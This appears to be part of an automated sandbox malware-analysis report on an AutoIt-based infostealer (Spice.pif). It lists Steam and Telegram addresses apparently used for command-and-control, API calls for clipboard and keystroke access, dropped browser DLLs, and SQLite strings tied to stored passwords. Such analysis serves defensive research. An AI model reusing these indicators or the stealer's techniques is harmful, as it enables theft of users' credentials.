Source: Spice.pif, 0000000B.00000003.2180401342.000000000481B000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.0000000004811000.00000040.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621375005.0000000001820000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180158067.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621300072.00000000017A0000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621187844.0000000001751000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180218902.00000000016C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199677575543Mozilla/5.0
Source: Spice.pif, 0000000B.00000002.2620952300.00000000016B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199677575543j
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199677575543[1].htm.11.dr	String found in binary or memory: https://store.steampowered.com/
Source: 76561199677575543[1].htm.11.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: Spice.pif, 0000000B.00000002.2620952300.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: Spice.pif, 0000000B.00000003.2179892773.00000000016C9000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180038050.0000000001821000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180269405.00000000017C8000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180478356.0000000001821000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180335897.00000000017C9000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180269405.00000000017A1000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2179949168.00000000016C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: Spice.pif, 0000000B.00000003.2180401342.000000000481B000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.0000000004811000.00000040.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621375005.0000000001820000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180158067.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621300072.00000000017A0000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621187844.0000000001751000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180218902.00000000016C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/snsb82
Source: Spice.pif, 0000000B.00000003.2180401342.000000000481B000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.0000000004811000.00000040.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621375005.0000000001820000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180158067.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621300072.00000000017A0000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621187844.0000000001751000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180218902.00000000016C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/snsb82At
Source: 0dN59ZIkEM.exe, 00000000.00000003.1353808235.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Automation.0.dr, Spice.pif.2.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: DGDAEHCB.11.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Spice.pif.2.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: 0dN59ZIkEM.exe, 00000000.00000003.1353808235.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Automation.0.dr, Spice.pif.2.dr	String found in binary or memory: https://www.globalsign.com/repository/06
Source: DGDAEHCB.11.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Spice.pif, 0000000B.00000002.2621187844.0000000001790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: Spice.pif, 0000000B.00000002.2621187844.0000000001790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 23.7.115.52:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 37.27.87.155:443 -> 192.168.2.8:49710 version: TLS 1.2

Source: C:\Users\user\Desktop\0dN59ZIkEM.exe

Code function: 0_2_004056A8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004056A8

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Code function: 11_2_00EE4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

11_2_00EE4830

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Code function: 11_2_00EE4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

11_2_00EE4632

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Code function: 11_2_00ED0508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

11_2_00ED0508

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Code function: 11_2_00EFD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

11_2_00EFD164

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Code function: 11_2_00ED42D5: CreateFileW,DeviceIoControl,CloseHandle,

11_2_00ED42D5

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Code function: 11_2_00EC8F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

11_2_00EC8F2E

Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Code function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_004034F7
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00ED5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		11_2_00ED5778

Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Code function: 0_2_00406BFE	0_2_00406BFE
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00E7B020	11_2_00E7B020
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00E794E0	11_2_00E794E0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00E79C80	11_2_00E79C80
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00E923F5	11_2_00E923F5
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00EF8400	11_2_00EF8400
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00EA6502	11_2_00EA6502
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00E7E6F0	11_2_00E7E6F0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00EA265E	11_2_00EA265E
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00E9282A	11_2_00E9282A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00EA89BF	11_2_00EA89BF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00EA6A74	11_2_00EA6A74
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00EF0A3A	11_2_00EF0A3A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00E80BE0	11_2_00E80BE0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00ECEDB2	11_2_00ECEDB2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00E9CD51	11_2_00E9CD51
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00EF0EB7	11_2_00EF0EB7
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00ED8E44	11_2_00ED8E44
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00EA6FE6	11_2_00EA6FE6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00E933B7	11_2_00E933B7
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00E8D45D	11_2_00E8D45D
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00E9F409	11_2_00E9F409
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00E7F6A0	11_2_00E7F6A0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00E916B4	11_2_00E916B4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00E71663	11_2_00E71663
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00E8F628	11_2_00E8F628
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00E978C3	11_2_00E978C3
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00E91BA8	11_2_00E91BA8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00E9DBA5	11_2_00E9DBA5
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00EA9CE5	11_2_00EA9CE5
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00E8DD28	11_2_00E8DD28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00E91FC0	11_2_00E91FC0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00E9BFD6	11_2_00E9BFD6

Source: Joe Sandbox View	Dropped File: C:\ProgramData\HCAEGCBFHJDG\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\HCAEGCBFHJDG\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: String function: 00E98B30 appears 42 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: String function: 00E90D17 appears 70 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: String function: 00E81A36 appears 34 times

Source: 0dN59ZIkEM.exe

Static PE information: invalid certificate

Source: 0dN59ZIkEM.exe, 00000000.00000003.1354277819.000000000282B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameAutoIt3.exeB vs 0dN59ZIkEM.exe

Source: 0dN59ZIkEM.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@22/39@2/3

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Code function: 11_2_00EDA6AD GetLastError,FormatMessageW,

11_2_00EDA6AD

Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Code function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	0_2_004034F7
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00EC8DE9 AdjustTokenPrivileges,CloseHandle,	11_2_00EC8DE9
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00EC9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	11_2_00EC9399

Source: C:\Users\user\Desktop\0dN59ZIkEM.exe

Code function: 0_2_00404954 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404954

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Code function: 11_2_00ED4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,

11_2_00ED4148

Source: C:\Users\user\Desktop\0dN59ZIkEM.exe

Code function: 0_2_004021AA CoCreateInstance,

0_2_004021AA

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Code function: 11_2_00ED443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

11_2_00ED443D

Source: C:\Users\user\Desktop\0dN59ZIkEM.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Wedding

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5844:120:WilError_03

Source: C:\Users\user\Desktop\0dN59ZIkEM.exe

File created: C:\Users\user\AppData\Local\Temp\nssD828.tmp

Jump to behavior

Source: 0dN59ZIkEM.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\0dN59ZIkEM.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\0dN59ZIkEM.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3.dll.11.dr, softokn3[1].dll.11.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: Spice.pif, 0000000B.00000002.2627022059.0000000010218000.00000002.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2623868667.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp, nss3[1].dll.11.dr, nss3.dll.11.dr, sqln[1].dll.11.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.11.dr, softokn3[1].dll.11.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: Spice.pif, 0000000B.00000002.2627022059.0000000010218000.00000002.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2623868667.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp, nss3[1].dll.11.dr, nss3.dll.11.dr, sqln[1].dll.11.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: Spice.pif, 0000000B.00000002.2627022059.0000000010218000.00000002.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2623868667.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp, nss3[1].dll.11.dr, nss3.dll.11.dr, sqln[1].dll.11.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: Spice.pif, 0000000B.00000002.2627022059.0000000010218000.00000002.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2623868667.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp, nss3[1].dll.11.dr, nss3.dll.11.dr, sqln[1].dll.11.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.11.dr, softokn3[1].dll.11.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: Spice.pif, 0000000B.00000002.2627022059.0000000010218000.00000002.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2623868667.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp, sqln[1].dll.11.dr	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: softokn3.dll.11.dr, softokn3[1].dll.11.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.11.dr, softokn3[1].dll.11.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.11.dr, softokn3[1].dll.11.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: Spice.pif, 0000000B.00000002.2627022059.0000000010218000.00000002.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2623868667.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp, sqln[1].dll.11.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: softokn3.dll.11.dr, softokn3[1].dll.11.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: Spice.pif, 0000000B.00000002.2627022059.0000000010218000.00000002.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2623868667.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp, nss3[1].dll.11.dr, nss3.dll.11.dr, sqln[1].dll.11.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: Spice.pif, 0000000B.00000002.2627022059.0000000010218000.00000002.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2623868667.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp, nss3[1].dll.11.dr, nss3.dll.11.dr, sqln[1].dll.11.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3.dll.11.dr, softokn3[1].dll.11.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: Spice.pif, 0000000B.00000002.2627022059.0000000010218000.00000002.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2623868667.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp, sqln[1].dll.11.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: GIIDBGDAFHJDHIDGDGII.11.dr, JJJEGHDAECBFHJKEGIJK.11.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
